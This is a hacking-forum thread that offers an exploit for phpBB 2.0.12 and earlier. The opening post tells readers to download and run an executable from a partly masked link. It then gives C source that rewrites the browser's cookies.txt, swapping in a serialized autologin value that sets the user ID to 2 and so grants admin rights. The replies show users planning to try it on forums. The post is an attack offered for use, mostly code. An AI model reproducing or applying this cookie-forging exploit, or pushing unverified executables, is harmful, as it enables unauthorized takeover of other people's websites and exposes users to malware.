Skip to content
MPGHThe Dark Arts
/
RegisterLog in
Forum
Community
What's NewLatest posts across the boardTrendingHottest threads right nowSubscribedThreads you follow
Discussion
GeneralIntroductionsEntertainmentDebate FortFlaming & Rage
Board
News & AnnouncementsMPGH TimesSuggestions & HelpGiveaways
More Sections
Art & Graphic DesignProgrammingHackingCryptocurrency
Hacks & Cheats
Games
ValorantCS2 / CS:GOCall of Duty / WarzoneFortniteApex LegendsEscape From Tarkov
+14 moreLeague of LegendsGTA VMinecraftRustROTMGBattlefieldTroveBattleOnCombat ArmsCrossFireBlackshotRuneScapeDayZDead by Daylight
Resources
Game Hacking TutorialsReverse EngineeringGeneral Game HackingAnti-CheatConsole Game Hacking
Tools
Game Hacking ToolsTrainers & CheatsHack/Release NewsNew
Submit a release →Share your cheat, tool, or config with the community.
AINEW
AI Tools
General & DiscussionPrompt EngineeringLLM JailbreaksHotAI Agents & AutomationLocal / Open Models
AI × Gaming
AI Aimbots & VisionML Anti-CheatGame Bots & Automation
Create
AI Coding / Vibe CodingAI Art & MediaAI Voice & TTS
The AI frontier →Where game hacking meets modern machine learning. Jump in.
Marketplace
Buy & Sell
SellingBuyingTradingUser Services
Trust & Safety
Middleman LoungeMarketplace TalkVouch Copy Profiles
Money
Cryptocurrency TalkCurrency ExchangeWork & Job Offers
Start selling →List accounts, services, and goods. Use the middleman to trade safe.
MPGH The Dark Arts

A community for offensive security research, reverse engineering, and AI.

Community

ForumMarketplaceSearch

Account

RegisterLog in

Legal

Privacy PolicyForum RulesHelp & FAQ
© 2026 MPGH · All rights reserved.Built by the community, for the community. For educational purposes onlyContent is shared for security research and education — we don't condone illegal use. You're responsible for complying with applicable laws. Use at your own risk.
Home › Forum › Hacking › Exploits › phpBB <==2.0.12 - [Admin Rights]!

phpBB <==2.0.12 - [Admin Rights]!

Posts 1–15 of 15 · Page 1 of 1
EX
eXe
phpBB <==2.0.12 - [Admin Rights]!
/*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^ *^*^*^*\
This is an exploit for phpBB 2.0.12 and under.
Its very simple to use but some forums have been patched.

First download the 897.rar file:
Code:
http://kisobo*****m/exploits/897.rar
Place 879.exe in your firefox folder.
Usually:
C:\DocumentsandSettings\ApplicationData\Mozilla\Fi refox\Profiles\something.default
Visit a site that is using phpBB 2.0.12 or under, close the browser!
Double click the .exe file.
Than, browse the Forums again.
This gives anonymous users administrator rights only.
If something goes wrong clear cookies and try again.

Source Code:

Code:
//Released on MPGH.net
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

//Taken from VeNoMouS's love cow code
char *search_and_replace (char *text, char *find, char *replace)
{
char *found,*new_text;
int
len_find=strlen(find),len_replace=strlen(replace),len_text=strlen(text),i=0,j=0;

if((new_text=(char*)malloc(len_text+len_replace-len_find+1))==NULL)
       {
       printf("malloc issue...\n");
       return new_text;
       }
found = strstr(text, find);
while (i <= len_text)
{
if ( found != text + i )
       {
       new_text[j] = text[i];
       i++;
       j++;
       }
       else
       {
           strcat (new_text, replace);
           i += len_find;
           j += len_replace;
           found = strstr (text + i, find);
       }
       new_text[j] = '\0';
}
return new_text;
}

int main()
{
  FILE * pFile;
  long lSize;
  char * buffer;

  pFile = fopen ( "cookies.txt" , "r" );
  if (pFile==NULL) exit (1);

  fseek (pFile , 0 , SEEK_END);
  lSize = ftell (pFile);
  rewind (pFile);

  buffer = (char*) malloc (lSize);
  if (buffer == NULL) exit (2);
  fread (buffer,1,lSize,pFile);
  fclose (pFile);

  pFile = fopen ( "cookies.txt" , "w" );
  fputs(search_and_replace((char *)buffer,"a%3A0%3A%7B%7D","a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D"), pFile);
  fclose (pFile);
  free (buffer);
  return 0;

}
//Released on MPGH.net
Brought To You By MPGH.net
\*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^* ^*^*^*^*/
#1 · 20y ago
arunforce
[MPGH]arunforce
Nice, gonna give this a try!
#2 · 20y ago
Skurdz
Skurdz
lol didnt you do that already with dave or sumthin? donno or that was pure hackage!
#3 · 20y ago
i eat trees
i eat trees
...firefox? sigh
#4 · 20y ago
LI
Lil Chris
i really hate this eXe guy this exploit is fucking old i think phpBB is in like phpBB 2.0.19 now so you are years late my friend =\
#5 · 20y ago
Dave84311
[MPGH]Dave84311
Few months at least...
#6 · 20y ago
i eat trees
i eat trees
It would have worked on the forum i wanted to hack but guests arnt aloud to post :/
#7 · 20y ago
Flawless
Flawless
Quote Originally Posted by Lil Chris
i really hate this eXe guy this exploit is fucking old i think phpBB is in like phpBB 2.0.19 now so you are years late my friend =\
Stop flaming on people, this one of the few things I hate seeing on these forums. You've been warned.
#8 · 20y ago
AthlaS
AthlaS
Can anyone give me an example of a forum this will work with? I already tried MPGH.
#9 · 20y ago
castaway
castaway
Quote Originally Posted by AthlaS View Post
Can anyone give me an example of a forum this will work with? I already tried MPGH.
You are really a Dumb Fuck if you say that on the forum.
#10 · 18y ago
Alen
Alen
Quote Originally Posted by thimo View Post
You are really a Dumb Fuck if you say that on the forum.
Thats nearly 2 years old thimo ... you ok?
#11 · 18y ago
radnomguywfq3
radnomguywfq3
PhpBB 3 is already out, I don't doubt people will be upgrading, although. 3.0 doesn't have Cats =X
#12 · 18y ago
RA
rambone11
gonna try xD thx :P
#13 · 18y ago
ME
melropower
sometinhing newer???
#14 · 18y ago
GG2GG
GG2GG
dont bring old shit up and fuck off mpgh after fool
#15 · 18y ago
Posts 1–15 of 15 · Page 1 of 1

Post a Reply

Similar Threads

  • Admin RightsBy Hitmaniac in MapleStory Help
    19Last post 15y ago
  • Admin, howto limit rights?By Gabbe in Call of Duty Modern Warfare 2 Help
    2Last post 16y ago
  • AdminsBy scuartas in General
    31Last post 16y ago
  • Joining [MPGH] Clan, Buying Admin etc.By Dmx in CounterStrike (CS) 1.6 Hacks / Counter Strike: Source (CSS) Hacks
    11Last post 20y ago
  • Phpbb forum hacksBy i eat trees in Hack Requests
    0Last post 20y ago

Tags for this Thread

None